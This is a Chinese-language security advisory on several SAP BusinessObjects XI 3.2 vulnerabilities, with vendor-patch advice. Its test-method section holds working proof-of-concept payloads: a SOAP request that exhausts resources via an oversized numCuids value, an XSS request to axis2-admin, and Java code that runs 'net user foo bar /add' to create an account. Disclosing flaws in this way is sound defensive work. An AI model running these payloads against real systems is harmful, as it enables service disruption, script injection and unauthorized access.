受影响系统:
SAP BusinessObjects XI 3.2 Enterprise
描述:
SAP BusinessObjects是一款商务智能软件和企业绩效解决方案。
远程攻击者可以利用SAP BusinessObjects的多个脚本和组件中的安全漏洞提升权限、导致拒绝服务、泄露敏感信息或执行跨站脚本。
1) dswsbobje/services/session的login SOAP方式根据Login参数的不同而返回不同的响应代码,这可以用于枚举有效的用户账号。
2) 在创建CUID期间dswsbobje/services/biplatformHTTP的GenerateCuids SOAP方式中的错误可能允许用户通过传送超长的numCuids参数耗尽可用的资源。
3) 由于没有正确的过滤提交给dswsbobje/axis2-admin/engagingglobally的modules参数便返回给了用户,这可能导致跨站脚本攻击。
4) CrystalReports/viewrpt.cwr脚本允许通过apstoken参数向任意主机发起连接,这可能导致在受限制的网络中执行端口扫描。
5) Central Configuration Manager中的错误允许用户通过Program Job Server获得权限提升。
<*来源:Joshua Abraham
Will Vandevanter
链接:http://secunia.com/advisories/38271/
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com:6405/AnalyticalReporting/AnalyticalReporting_merge_web.xml
<?xml version="1.0" encoding="UTF-8" ?>
– <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
– <soapenv:Body>
– <GenerateCuids xmlns="http://biplatform.dsws.businessobjects.com/2007/06/01">
<SessionID xmlns="http://biplatform.dsws.businessobjects.com/2007/06/01">it- dirs8l4vkou4%3A6400|%40it-dirs8l4vkou4%3A6400|it- dirs8l4vkou4%3A6400%402149JabmPLnS4EzOXTzw2148JfhkJg2K28oTJ1Nq|osca%3Aiiop %3A%2F%2Fit- dirs8l4vkou4%3A6400%3BSI_SESSIONID%3D2148JfhkJg2K28oTJ1Nq|en_US|America/Los_ Angeles”></SessionID>
<numCuids xmlns="http://biplatform.dsws.businessobjects.com/2007/06/01">100000</numCuids>
</GenerateCuids>
</soapenv:Body>
</soapenv:Envelope>
GET /dswsbobje/axis2-
admin/engagingglobally?modules="%3e%20%3cXSS%3e&submit=+Engage+
HTTP/1.1
Host: x.x.x.x:8080
package org.apache.axis2.axis2userguide;
import java.io.IOException;
public class AddUser {
public AddUser() {
}
public void main() {
Process process;
try {
process = Runtime.getRuntime().exec("net user foo bar /add");
}
catch(IOException ioexception) {
ioexception.printStackTrace();
}
return;
}
}
建议:
厂商补丁:
SAP
—
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
0 条评论。